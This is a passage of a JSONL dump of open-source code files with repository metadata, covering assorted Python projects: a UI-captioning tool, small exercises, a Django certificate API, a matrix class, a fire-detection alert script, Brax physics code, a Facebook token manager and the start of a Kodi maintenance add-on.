in elements:\n bound = ele['bounds']\n clips.append(self.img[bound[1]: bound[3], bound[0]:bound[2]])\n captions = self.model_icon_caption.predict_images(clips)\n for i, ele in enumerate(elements):\n ele['caption'] = captions[i]\n\n def classify_elements(self, elements=None):\n if self.model_icon_classification is None:\n self.model_icon_classification = IconClassifier(model_path='../utils/classification/model_results/best-0.93.pt',\n class_path='../utils/classification/model_results/iconModel_labels.json')\n elements = self.elements_leaves if elements is None else elements\n clips = []\n for ele in elements:\n bound = ele['bounds']\n clips.append(self.img[bound[1]: bound[3], bound[0]:bound[2]])\n classes = self.model_icon_classification.predict_images(clips)\n for i, ele in enumerate(elements):\n if classes[i][1] > 0.95:\n ele['icon-cls'] = classes[i][0]\n else:\n ele['icon-cls'] = None\n\n '''\n ***********************\n *** Structural Tree ***\n ***********************\n '''\n def ui_element_tree(self):\n '''\n Form a hierarchical element tree with a few key attributes to represent the vh\n => self.element_tree\n => self.blocks\n '''\n # print('--- Generate element tree ---')\n self.element_tree = self.combine_children_to_tree(self.elements[0])\n json.dump(self.element_tree, open(self.output_file_path_element_tree, 'w'), indent=4)\n # print('Save element tree to', self.output_file_path_element_tree)\n\n def combine_children_to_tree(self, element):\n element_cp = copy.deepcopy(element)\n if 'children-id' in element_cp:\n element_cp['children'] = []\n for c_id in element_cp['children-id']:\n element_cp['children'].append(self.combine_children_to_tree(self.elements[c_id]))\n self.select_ele_attr(element_cp, ['scrollable', 'id', 'resource-id', 'class', 'clickable', 'children', 'description', 'area'])\n else:\n self.select_ele_attr(element_cp, ['id', 'resource-id', 'class', 'clickable', 'children', 'description', 'area'])\n self.simplify_ele_attr(element_cp)\n return element_cp\n\n def select_ele_attr(self, element, selected_attrs):\n element_cp = copy.deepcopy(element)\n for key in element_cp.keys():\n if key == 'selected' and element[key]:\n continue\n if key not in selected_attrs or element[key] is None or element[key] == '':\n del(element[key])\n\n def simplify_ele_attr(self, element):\n if 'resource-id' in element:\n element['resource-id'] = element['resource-id'].replace('com', '')\n element['resource-id'] = element['resource-id'].replace('android', '')\n element['resource-id'] = element['resource-id'].replace('..', '.')\n element['resource-id'] = element['resource-id'].replace('.:', ':')\n if 'class' in element:\n element['class'] = element['class'].replace('android', '')\n element['class'] = element['class'].replace('..', '.')\n element['class'] = element['class'].replace('.:', ':')\n\n def get_ui_element_node_by_id(self, ele_id):\n ele_id = int(ele_id)\n if ele_id >= len(self.elements):\n print('No element with id', ele_id, 'is found')\n return None\n return self.search_node_by_id(self.element_tree, ele_id)\n\n def search_node_by_id(self, node, ele_id):\n if node['id'] == ele_id:\n return node\n if node['id'] > ele_id:\n return None\n if 'children' in node:\n last_child = None\n for child in node['children']:\n if child['id'] == ele_id:\n return child\n if child['id'] > ele_id:\n break\n last_child = child\n return self.search_node_by_id(last_child, ele_id)\n\n '''\n *********************\n *** Visualization ***\n *********************\n '''\n def show_each_element(self, 
only_leaves=False):\n board = self.img.copy()\n if only_leaves:\n elements = self.elements_leaves\n print(len(elements))\n else:\n elements = self.elements\n for ele in elements:\n print(ele['class'])\n print(ele, '\\n')\n bounds = ele['bounds']\n clip = self.img[bounds[1]: bounds[3], bounds[0]: bounds[2]]\n color = (0,255,0) if not ele['clickable'] else (0,0,255)\n cv2.rectangle(board, (bounds[0], bounds[1]), (bounds[2], bounds[3]), color, 3)\n cv2.imshow('clip', cv2.resize(clip, (clip.shape[1] // 3, clip.shape[0] // 3)))\n cv2.imshow('ele', cv2.resize(board, (board.shape[1] // 3, board.shape[0] // 3)))\n if cv2.waitKey() == ord('q'):\n break\n cv2.destroyAllWindows()\n\n def show_all_elements(self, only_leaves=False):\n board = self.img.copy()\n if only_leaves:\n elements = self.elements_leaves\n else:\n elements = self.elements\n for ele in elements:\n bounds = ele['bounds']\n color = (0,255,0) if not ele['clickable'] else (0,0,255)\n cv2.rectangle(board, (bounds[0], bounds[1]), (bounds[2], bounds[3]), color, 3)\n cv2.imshow('elements', cv2.resize(board, (board.shape[1] // 3, board.shape[0] // 3)))\n key = cv2.waitKey()\n # cv2.destroyWindow('elements')\n return key\n\n def show_element(self, element, show_children=True):\n board = self.img.copy()\n color = (0,255,0) if not element['clickable'] else (0,0,255)\n bounds = element['bounds']\n cv2.rectangle(board, (bounds[0], bounds[1]), (bounds[2], bounds[3]), color, 3)\n if show_children and 'children-id' in element:\n for c_id in element['children-id']:\n bounds = self.elements[c_id]['bounds']\n cv2.rectangle(board, (bounds[0], bounds[1]), (bounds[2], bounds[3]), (255,0,255), 3)\n cv2.imshow('element', cv2.resize(board, (board.shape[1] // 3, board.shape[0] // 3)))\n cv2.waitKey()\n cv2.destroyWindow('element')\n\n def show_element_by_id(self, ele_id, show_children=True):\n element = self.elements[ele_id]\n self.show_element(element, show_children)\n\n def show_screen(self):\n cv2.imshow('screen', self.img)\n cv2.waitKey()\n cv2.destroyWindow('screen')\n\n\nif __name__ == '__main__':\n load = False\n gui = GUI(gui_img_file='data/rico/raw/0.png',\n gui_json_file='../data/rico/raw/0.json',\n output_file_root='../data/rico/guidata',\n resize=(1440, 2560))\n # load previous result\n if load:\n gui.load_elements()\n # process from scratch\n else:\n gui.ui_info_extraction()\n gui.ui_analysis_elements_description()\n gui.ui_element_tree()\n gui.show_all_elements(only_leaves=True)\n","repo_name":"MulongXie/UI-Captioning","sub_path":"module/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":20172,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"37855707672","text":"while True:\n print('')\n print('\\\n ____ _ _ \\n\\\n / ___|_ _ ___ ___ ___| \\ | |_ _ _ __ ___ \\n\\\n| | _| | | |/ _ \\/ __/ __| \\| | | | | \\'_ ` _ \\ \\n\\\n| |_| | |_| | __/\\__ \\__ \\ |\\ | |_| | | | | | | \\n\\\n \\____|\\__,_|\\___||___/___/_| \\_|\\__,_|_| |_| |_| \\n\\\n ')\n print('1. Start game')\n print('2. 
quit')\n\n op = input('>>> ')\n if op == '1':\n\n ans = int(input('please input the ans (0~100): '))\n start = 0\n end = 100\n count = 0\n while True:\n print('round', count)\n guess = int(input('guess a number ('+str(start)+'~'+str(end)+'): '))\n if guess > ans:\n print('lower')\n end = guess\n elif guess < ans:\n print('higher')\n start = guess\n else:\n print('hit')\n break\n count += 1\n print()\n\n print('yes, my ans is', ans)\n print('you use', count, 'round')\n\n if op == '2':\n break","repo_name":"bearhsiang/PythonIsSoEazy","sub_path":"hw/jul_7.py","file_name":"jul_7.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"12836585261","text":"from tkinter import*\r\nfrom tkinter import filedialog\r\nfrom tkPDFViewer import tkPDFViewer as pdf\r\nimport os\r\n\r\nroot = Tk()\r\n#For the title\r\nroot.title(\"LEPLA :-: PDF Viwer\")\r\n\r\n#for the icon change\r\nroot.iconbitmap('D:/Icons/bush.ico')\r\n\r\n#windows geometry \r\nroot.geometry('630x700+400+100')\r\n\r\ndef browsefiles():\r\n filename=filedialog.askopenfilename(initialdir=os.getcwd(),\r\n title=\"Select Your PDF File\", filetypes=((\"PDF File\",\".pdf\"),\r\n (\"PDF File\",\".PDF\"),\r\n (\"All File\",\"txt\")))\r\n v1=pdf.ShowPdf()\r\n v2=v1.pdf_view(root, pdf_location=open(filename,\"r\"), width=77, height=100)\r\n v2.pack(pady=(0,0))\r\n\r\nbutton=Button(root, text=\"PDF Viwer\",command=browsefiles, width=40, bd=4)\r\nbutton.pack()\r\n\r\n# for background colour \r\nroot.configure(bg='#E7D7CB')\r\nroot.mainloop()\r\n","repo_name":"shrutiypatil/Mini-Projects","sub_path":"PDF.py","file_name":"PDF.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"22101461825","text":"MED = 0\nCHI = 0\nGRA = 0\nN = int(input(\"Cuales son los numeros de ventas del vendedor: \"))\nfor i in range(1,N,1):\n V = float(input(\"De cuanto es tu venta:$ \"))\n if V<=200:\n CHI += 1\n else:\n if V<400:\n MED += 1\n else:\n GRA += 1\nprint(f\"CHI es:\",CHI)\nprint(f\"La acumulacion de ventas menores:\",MED)\nprint(f\"GRA es:\",GRA)\nprint(\"Fin del programa\")\n","repo_name":"JaimeOmar1904/CYPJaimeRM","sub_path":"libro/problemas_resueltos/capitulo3/problema3_7.py","file_name":"problema3_7.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"14398563436","text":"import uuid\nfrom datetime import date\nfrom django.http import JsonResponse\nfrom django.middleware.csrf import get_token\nimport json\nfrom .models import Certificate, CertificateDetails\n\n'''The following operations are the request and response engine \n for the application which recieves request according to the desired operation'''\n\n\ndef generate_certificate(request):\n if request.method == 'POST':\n payload = json.loads(request.body.decode('utf-8'))\n name = payload.get('name')\n course_name = payload.get('course_name')\n certificate_award_date = payload.get('certificate_award_date')\n \n\n '''Generate a unique ID for the certificate'''\n\n certificate_id = str(uuid.uuid4()).upper()\n\n '''Set the certificate generation date to today's date'''\n \n certificate_generation_date = date.today().strftime('%Y-%m-%d')\n\n ''' creates an object to save the details such as id and date of generation in the database \n with the help of Foreign Key of certificate id and certificate generated 
date '''\n\n cert = Certificate.objects.create(certificate_unique_id = certificate_id, \n certificate_generation_date = certificate_generation_date)\n\n\n '''Create a dictionary containing the certificate details'''\n\n certificate = {\n 'name': name,\n 'course-name': course_name,\n 'certificate_award_date': certificate_award_date,\n 'certificate_generation_date': certificate_generation_date,\n 'certificate_id': certificate_id,\n }\n\n ''' creates an object to save all the details of the certificate in the database \n with the help of Foreign Key of certificate id and certificate generated date '''\n \n certificate_details = CertificateDetails.objects.create(\n certificate_id=cert,\n name= name,\n course_name=course_name,\n certificate_award_date= certificate_award_date \n )\n certificate_details.save()\n \n return JsonResponse(certificate)\n\n '''If the request method is not POST, return a 405 Method Not Allowed response'''\n\n return JsonResponse({'error': 'Method Not Allowed'})\n\n\ndef verify_certificate(request):\n \n payload = json.loads(request.body.decode('utf-8'))\n certificate_generation_date = payload.get('certificate_generation_date')\n certificate_id = payload.get('certificate_id')\n is_valid_certificate = False\n try:\n '''get function to detect the id and the date from the database to validate the certificate'''\n\n Certificate.objects.get(certificate_unique_id=certificate_id, certificate_generation_date=certificate_generation_date)\n is_valid_certificate = True\n except Exception as e:\n print(f\"Some exception occured - {e}\")\n return JsonResponse({'is_valid_certificate': is_valid_certificate})\n\n\ndef fetch_certificate(request):\n payload = json.loads(request.body.decode('utf-8'))\n certificate_id = payload.get('certificate_id')\n certificate_generation_date = payload.get('certificate_generation_date')\n try:\n certificate_1 = CertificateDetails.objects.get(certificate_id__certificate_unique_id=certificate_id, certificate_id__certificate_generation_date=certificate_generation_date)\n\n '''Create a dictionary containing the certificate details'''\n\n certificate_details = {\n 'name': certificate_1.name,\n 'course-name': certificate_1.course_name,\n 'certificate_award_date': certificate_1.certificate_award_date,\n 'certificate_generation_date': certificate_1.certificate_id.certificate_generation_date,\n 'certificate_id': certificate_1.certificate_id.certificate_unique_id,\n }\n except CertificateDetails.DoesNotExist:\n return JsonResponse({'error': 'Certificate not found'}) \n \n return JsonResponse(certificate_details)","repo_name":"Saro259/Certificate-Generator-API","sub_path":"certificate_generator_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"380257814","text":"import numpy as np\r\n\r\n\r\nclass Matrix(object):\r\n '''\r\n Класс, представляющий собой матрицу и многие методы к ней\r\n '''\r\n\r\n def __init__(self, matr):\r\n types = (np.ndarray, list, tuple)\r\n\r\n if type(matr) not in types:\r\n raise TypeError('Не могу обработать такой тип')\r\n\r\n if type(matr[0]) not in types:\r\n raise ValueError('Объект не двумерный')\r\n\r\n if type(matr[0][0]) in types:\r\n raise ValueError('Слишком много измерений')\r\n\r\n a = len(matr[0])\r\n for row in matr:\r\n if type(row) not in types:\r\n raise ValueError('Матрица не целостная')\r\n\r\n if len(row) != a:\r\n raise ValueError('Объект не прямоугольной формы')\r\n a = 
len(row)\r\n\r\n for item in row:\r\n if type(item) in types:\r\n raise ValueError('Где-то лишнее измерение')\r\n\r\n self.matrix = np.array(matr, dtype='float')\r\n\r\n def add_row(self, row):\r\n # Добавление строки в матрицу\r\n if len(row) != self.matrix.shape[1]:\r\n raise TypeError('Длинна строки не совпадает с длинной матрицы!')\r\n\r\n self.matrix = np.vstack([self.matrix, row])\r\n\r\n return Matrix(self.matrix)\r\n\r\n def add_column(self, column):\r\n # Добавление столбца в матрицу\r\n if len(column) != self.matrix.shape[0]:\r\n raise TypeError('Высота столбца не совпадает с высотой матрицы!')\r\n\r\n self.matrix = np.hstack([self.matrix, np.reshape(column, (len(column), 1))])\r\n\r\n return Matrix(self.matrix)\r\n\r\n @property\r\n def shape(self):\r\n # Функция для получения формы матрицы\r\n return self.matrix.shape\r\n\r\n def __matmul__(self, other):\r\n # Математическое умножение матриц\r\n if self.matrix.shape[0] != other.matrix.shape[1]:\r\n raise ValueError('Высота первой матрицы не совпадает с шириной второй!')\r\n\r\n new_M = np.zeros((self.matrix.shape[0], other.matrix.shape[1]))\r\n for i in range(self.matrix.shape[0]):\r\n for j in range(other.matrix.shape[1]):\r\n new_M[i, j] = sum(self.matrix[i, :] * other.matrix[:, j])\r\n\r\n return Matrix(new_M)\r\n\r\n def __mul__(self, other):\r\n # Умножение матрицы на число или методом Адамара\r\n if type(other) == Matrix:\r\n return Matrix(self.matrix * other.matrix)\r\n else:\r\n return Matrix(self.matrix * other)\r\n\r\n def __add__(self, other):\r\n # Сложение матриц\r\n if self.matrix.shape != other.matrix.shape:\r\n raise TypeeError('Матрицы разной размерности!')\r\n new_M = np.zeros(self.matrix.shape)\r\n\r\n for i in range(self.matrix.shape[0]):\r\n for j in range(self.matrix.shape[1]):\r\n new_M[i, j] = self.matrix[i, j] + other.matrix[i, j]\r\n\r\n return Matrix(new_M)\r\n\r\n def __sub__(self, other):\r\n # Вычетание матриц\r\n if self.matrix.shape != other.matrix.shape:\r\n raise TypeeError('Матрицы разной размерности!')\r\n new_M = np.zeros(self.matrix.shape)\r\n\r\n for i in range(self.matrix.shape[0]):\r\n for j in range(self.matrix.shape[1]):\r\n new_M[i, j] = self.matrix[i, j] - other.matrix[i, j]\r\n\r\n return Matrix(new_M)\r\n\r\n @property\r\n def T(self):\r\n # Транспонирование матрицы\r\n TM = np.zeros(self.matrix.shape[::-1])\r\n for i in range(len(self.matrix)):\r\n for j in range(len(self.matrix[0])):\r\n TM[j, i] = self.matrix[i, j]\r\n\r\n return Matrix(TM)\r\n\r\n @property\r\n def trace(self):\r\n # След матрицы\r\n return sum(self.m_diag)\r\n\r\n def kron(self, other):\r\n # Умножение матриц методом Кронекера\r\n rows = []\r\n for i in range(len(self.matrix)):\r\n row = []\r\n for j in range(len(self.matrix[0])):\r\n row.append(other.matrix * self.matrix[i, j])\r\n rows.append(row)\r\n\r\n n_rows = []\r\n for row in rows:\r\n n_row = row[0]\r\n for item in row[1:]:\r\n n_row = np.hstack([n_row, item])\r\n n_rows.append(n_row)\r\n\r\n new_M = n_rows[0]\r\n for row in n_rows[1:]:\r\n new_M = np.vstack([new_M, row])\r\n\r\n return Matrix(new_M)\r\n\r\n @property\r\n def m_diag(self):\r\n # Получение главной диагонали матрицы\r\n tr = []\r\n for i in range(min(self.matrix.shape)):\r\n tr.append(self.matrix[i, i])\r\n return tr\r\n\r\n def __pow__(self, other):\r\n # Возведение матрицы в степень\r\n if other < 0:\r\n raise ValueError('Степень должна быть неотрицательной!')\r\n\r\n if other == 0:\r\n return Matrix(np.diag(np.ones(min(self.shape))))\r\n\r\n new_M = Matrix(self.matrix)\r\n for i in 
range(other - 1):\r\n new_M = new_M @ Matrix(self.matrix)\r\n\r\n return new_M\r\n\r\n @property\r\n def inv(self):\r\n # Обратная матрица\r\n if self.det == 0:\r\n raise ValueError('Определитель не должен быть равен нулю!')\r\n\r\n return Matrix(np.linalg.inv(self.matrix))\r\n\r\n # Функция добавлена для полноты функционала, реализована через numpy\r\n\r\n @property\r\n def det(self):\r\n # Определитель матрицы\r\n if self.matrix.shape[0] != self.matrix.shape[1]:\r\n raise TypeError('Матрица должна быть квадратной!')\r\n\r\n return np.linalg.det(self.matrix)\r\n\r\n # Функция добавлена для полноты функционала, реализована через numpy\r\n\r\n def __repr__(self):\r\n # Функция, отвечающая за вывод данных о матрице\r\n return str(self.matrix)","repo_name":"kykazabra/Matrixes","sub_path":"Матрицы и операции.py","file_name":"Матрицы и операции.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"32784390721","text":"# importing libraries \n\nimport numpy as np \nimport cv2 \nimport tensorflow as tf\nimport os\nimport urllib.request\nimport time\nfrom multiprocessing import Process\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom twilio.rest import Client\n\n\n#function to make predictions using saved model\ndef predict_now(img,model):\n\n\n resize = cv2.resize(img,(160,160))\n rgb = cv2.cvtColor(resize,cv2.COLOR_BGR2RGB)\n test2 = rgb[np.newaxis is None,:,:,:]\n\n #make prediction and calculate time required\n start = time.time()\n predictions = model.predict(test2)\n end = time.time()\n os.system('clear')\n\n print('Predictions:{} Time taken: {}\\n'.format(predictions[0][0], end-start))\n \n #based of model predictions send out message to user on whatasapp if there is a fire hazaard detected \n if predictions < -1 :\n print('Fire hazard!\\n')\n \n client.messages.create(body='Fire Hazard',\n from_=from_whatsapp_number,\n to=to_whatsapp_number)\n\n elif predictions > -1 and predictions < 1.5:\n print('Warning posibility of fire\\n')\n \n client.messages.create(body='warning Possible Fire Hazard',\n from_=from_whatsapp_number,\n to=to_whatsapp_number)\n\n else:\n print('No fire hazard\\n')\n\n time.sleep(1)\n print('New image capture')\n\n return predictions[0][0], end-start\n\n\n\n#stream from a link or use webcams connected to the device\nsource = 'rtsp://192.168.0.102:8080/video/h264'\n\n #OR \n\n# source = 0\n\n#path to model on the device\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\npath_to_model = os.path.join(BASE_DIR, 'fire_detect_model')\nclient = Client()\n\n#using twilo to detect number\nfrom_whatsapp_number='whatsapp:+14155238886'\n\nto_whatsapp_number='whatsapp:+918286838255'\n\n#loac model\nmodel = tf.keras.models.load_model(path_to_model)\n\nif __name__ == '__main__':\n\n\n cap = cv2.VideoCapture(source)\n start = start = time.time()\n diff=1\n while(1): \n # make predictions every 6 seconds \n if int(diff)%6 == 0:\n predict_now(img,model)\n\n ret, img = cap.read();\n\n cv2.imshow('image', img)\n\n #calc time elasped\n end = time.time()\n diff = end-start\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()","repo_name":"TareDevarsh/fire_detection_ml","sub_path":"model_load.py","file_name":"model_load.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"37124218836","text":"import logging\nfrom typing 
import List, Optional\n\nfrom facebook_business.api import FacebookRequest\n\nfrom common.connect.redis import get_redis\nfrom common.enums.entity import Entity\nfrom common.store.scope import AssetScope\nfrom oozer.common.facebook_api import PlatformApiContext, DEFAULT_PAGE_ACCESS_TOKEN_LIMIT\nfrom oozer.common.job_scope import JobScope\n\nlogger = logging.getLogger(__name__)\n\n\nclass PageTokenManager:\n def __init__(self, asset_scope: str, sweep_id: str):\n self._redis = get_redis()\n self._sweep_id = sweep_id\n self._asset_scope = asset_scope\n\n def token_queue_key(self, page_id: str) -> str:\n return f'{self._asset_scope}-{self._sweep_id}-page-{page_id}-tokens-queue'\n\n @classmethod\n def populate_from_scope_entity(cls, scope_entity: AssetScope, sweep_id: str):\n asset_scope = JobScope.namespace\n tokens = list(scope_entity.platform_tokens)\n\n try:\n manager = PageTokenManager(asset_scope, sweep_id)\n with PlatformApiContext(tokens[0]) as fb_ctx:\n request = FacebookRequest(\n node_id='me', method='GET', endpoint='/accounts', api=fb_ctx.api, api_type='NODE'\n )\n request.add_params({'limit': DEFAULT_PAGE_ACCESS_TOKEN_LIMIT})\n cnt = 0\n while True:\n # I assume that there's a better way to do paginate over this,\n # but I wasn't able to find the corresponding target class in SDK :/\n response = request.execute()\n response_json = response.json()\n for page in response_json['data']:\n manager.add(page['id'], page['access_token'])\n cnt += 1\n\n if 'next' in response_json['paging']:\n request._path = response_json['paging']['next']\n else:\n break\n\n logger.warning(f'Loaded {cnt} page tokens for scope \"{scope_entity.scope}\"')\n except Exception as ex:\n print(ex)\n logger.warning('Fetching page tokens has failed so organic data jobs will not work in this sweep')\n\n @classmethod\n def from_job_scope(cls, job_scope: JobScope) -> 'PageTokenManager':\n \"\"\"\n infers required asset scope parameters from JobScope data\n and creates an instance of PlatformTokenManager properly set for\n management of tokens required for the job.\n\n Convenience method for use in worker code for quick derivation\n of appropriate scope for the PlatformTokenManager\n\n This is the \"read\" side of the \"write\" side depicted in\n populate_from_scope_entity method immediately above.\n If you change it here, change it there.\n \"\"\"\n if job_scope.entity_type == Entity.Scope:\n asset_scope = job_scope.entity_id\n else:\n # TODO: This needs to be scope ID somehow eventually\n # as platform tokens are grouped per scope ID\n # Until then, we, effectively, will have only one tokens pool\n asset_scope = job_scope.namespace # likely something like 'fb' or 'tw'\n\n return PageTokenManager(asset_scope, job_scope.sweep_id)\n\n def add(self, page_id: str, *tokens: List[str]):\n \"\"\"\n Add one or more tokens to the tokens inventory.\n\n Seeds temporary tokens inventory with tokens, while resetting\n their usage counters to zero.\n \"\"\"\n self._redis.zadd(\n self.token_queue_key(page_id),\n # switching this from **dict((token, 0) for token in tokens)\n # to positional args list and thus *args passing because when we do dict()\n # each token value becomes a hash key, that is coerced into\n # acting as a named arg, which is dangerous for tokens\n # that may contain characters not allowed to be in variable names.\n # So, keeping them as positional str args instead\n # Combined list must be a sequence of key, score, key2, score2, ...\n *(arg for token in tokens for arg in [token, 0]),\n )\n\n def remove(self, 
page_id: str, *tokens: List[str]):\n \"\"\"\n Like .add but in reverse.\n \"\"\"\n self._redis.zrem(self.token_queue_key(page_id), *tokens)\n\n def get_best_token(self, page_id: str) -> Optional[str]:\n token_candidate = (self._redis.zrange(self.token_queue_key(page_id), 0, 1) or [None])[0]\n if token_candidate is not None:\n return token_candidate.decode('utf8')\n return None\n","repo_name":"panoramichq/data-collection-fb","sub_path":"common/page_tokens.py","file_name":"page_tokens.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"38316528884","text":"from brax import actuator\nfrom brax import com\nfrom brax import fluid\nfrom brax import geometry\nfrom brax import kinematics\nfrom brax.base import Motion, System\nfrom brax.positional import collisions\nfrom brax.positional import integrator\nfrom brax.positional import joints\nfrom brax.positional.base import State\nimport jax\nfrom jax import numpy as jp\n\n\ndef init(\n sys: System, q: jax.Array, qd: jax.Array, debug: bool = False\n) -> State:\n \"\"\"Initializes physics state.\n\n Args:\n sys: a brax system\n q: (q_size,) joint angle vector\n qd: (qd_size,) joint velocity vector\n debug: if True, adds contact to the state for debugging\n\n Returns:\n state: initial physics state\n \"\"\"\n # position/velocity level terms\n x, xd = kinematics.forward(sys, q, qd)\n j, jd, a_p, a_c = kinematics.world_to_joint(sys, x, xd)\n x_i, xd_i = com.from_world(sys, x, xd)\n contact = geometry.contact(sys, x) if debug else None\n mass = sys.link.inertia.mass ** (1 - sys.spring_mass_scale)\n return State(q, qd, x, xd, contact, x_i, xd_i, j, jd, a_p, a_c, mass)\n\n\ndef step(\n sys: System, state: State, act: jax.Array, debug: bool = False\n) -> State:\n \"\"\"Performs a single physics step using position-based dynamics.\n\n Resolves actuator forces, joints, and forces at acceleration level, and\n resolves collisions at velocity level with baumgarte stabilization.\n\n Args:\n sys: system defining the kinematic tree and other properties\n state: physics state prior to step\n act: (act_size,) actuator input vector\n debug: if True, adds contact to the state for debugging\n\n Returns:\n x: updated link transform in world frame\n xd: updated link motion in world frame\n \"\"\"\n x_i_prev = state.x_i\n\n # calculate acceleration level updates\n tau = actuator.to_tau(sys, act, state.q, state.qd)\n xdd_i = Motion.create(vel=sys.gravity)\n # get joint constraint forces\n xf_i = joints.acceleration_update(sys, state, tau)\n if sys.enable_fluid:\n inertia = sys.link.inertia.i ** (1 - sys.spring_inertia_scale)\n xf_i += fluid.force(sys, state.x, state.xd, state.mass, inertia)\n xdd_i += Motion(\n ang=jax.vmap(lambda x, y: x @ y)(com.inv_inertia(sys, state.x), xf_i.ang),\n vel=jax.vmap(lambda x, y: x * y)(1 / state.mass, xf_i.vel),\n )\n\n # semi-implicit euler: apply acceleration update before resolving collisions\n x_i, xd_i = integrator.integrate_xdd(sys, state.x_i, state.xd_i, xdd_i)\n x, xd = com.to_world(sys, x_i, xd_i)\n state = state.replace(x=x, xd=xd, x_i=x_i, xd_i=xd_i)\n\n # perform position level joint updates\n x_i = joints.position_update(sys, state)\n x, _ = com.to_world(sys, x_i, xd_i)\n state = state.replace(x=x, x_i=x_i)\n\n # apply position level collision updates\n contact = geometry.contact(sys, x)\n x_i, dlambda = collisions.resolve_position(sys, state, x_i_prev, contact)\n xd_i_prev = xd_i\n\n xd_i = integrator.project_xd(sys, x_i, 
x_i_prev)\n x, xd = com.to_world(sys, x_i, xd_i)\n state = state.replace(x=x, xd=xd, x_i=x_i, xd_i=xd_i)\n\n # apply velocity level collision updates\n xdv_i = collisions.resolve_velocity(sys, state, xd_i_prev, contact, dlambda)\n xd_i = integrator.integrate_xdv(sys, xd_i, xdv_i)\n\n x, xd = com.to_world(sys, x_i, xd_i)\n j, jd, a_p, a_c = kinematics.world_to_joint(sys, x, xd)\n q, qd = kinematics.inverse(sys, j, jd)\n contact = geometry.contact(sys, x) if debug else None\n\n return State(q, qd, x, xd, contact, x_i, xd_i, j, jd, a_p, a_c, state.mass)\n","repo_name":"google/brax","sub_path":"brax/positional/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":1857,"dataset":"github-code","pt":"82"} +{"seq_id":"28064707627","text":"# сначала количество пар элементов последовательности, \r\n#в которых хотя бы одно число делится на 3, \r\n#затем максимальную из сумм элементов таких пар\r\ncount = 0\r\nm = -20001\r\nf = open('17/37336.txt')\r\nl = [int(i) for i in f]\r\nfor i in range(len(l) - 1):\r\n if (l[i] % 3 == 0) or (l[i + 1] % 3 == 0):\r\n count += 1\r\n m = max(m, l[i]+ l[i + 1])\r\nprint(count, m)","repo_name":"maximkidalov/kostya_ege","sub_path":"егэ/17/37336.py","file_name":"37336.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"31191464017","text":"#Фибоначчи\r\nfirst = 1\r\nsecond = 2\r\n\r\ni = 0\r\nn = input(\"какой элемент (указывать целое число!) из ряда вам нужен?: \")\r\nwhile n.isdigit() is False or int(n) < 0:\r\n n = input(\"какой элемент (указывать целое число!) из ряда вам нужен?: \")\r\nwhile i < int(n):\r\n the_sum = first + second\r\n first = second\r\n second = the_sum\r\n i += 1\r\nprint(the_sum)\r\n\r\n","repo_name":"YuryYefr/PyBase08","sub_path":"HW_2_4.py","file_name":"HW_2_4.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"18804748388","text":"\"\"\"\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. 
If not, see <http://www.gnu.org/licenses/>.\r\n\"\"\"\r\nimport xbmc, xbmcaddon, xbmcgui, xbmcplugin, xbmcvfs,os,sys\r\nimport urllib\r\nimport re\r\nimport time\r\nimport zipfile\r\nfrom math import trunc\r\nfrom resources.lib.modules import control\r\nfrom datetime import datetime\r\nfrom resources.lib.modules.backtothefuture import unicode, PY2\r\n\r\nif PY2:\r\n FancyURLopener = urllib.FancyURLopener\r\n translatePath = xbmc.translatePath\r\nelse:\r\n FancyURLopener = urllib.request.FancyURLopener\r\n translatePath = xbmcvfs.translatePath\r\n\r\ndp = xbmcgui.DialogProgress()\r\ndialog = xbmcgui.Dialog()\r\naddonInfo = xbmcaddon.Addon().getAddonInfo\r\n\r\nAddonTitle=\"EZ Maintenance+\"\r\nAddonID ='script.ezmaintenanceplus'\r\n\r\n\r\ndef xml_data_advSettings_old(size):\r\n xml_data=\"\"\"\r\n \r\n 10\r\n 20\r\n 2\r\n %s\r\n 2\r\n 20\r\n \r\n\"\"\" % size\r\n return xml_data\r\n\r\ndef xml_data_advSettings_New(size):\r\n xml_data=\"\"\"\r\n \r\n 10\r\n 20\r\n 2\r\n \r\n \r\n %s\r\n 2\r\n 20\r\n \r\n\"\"\" % size\r\n return xml_data\r\n\r\ndef advancedSettings():\r\n XML_FILE = translatePath(os.path.join('special://home/userdata' , 'advancedsettings.xml'))\r\n MEM = xbmc.getInfoLabel(\"System.Memory(total)\")\r\n FREEMEM = xbmc.getInfoLabel(\"System.FreeMemory\")\r\n BUFFER_F = 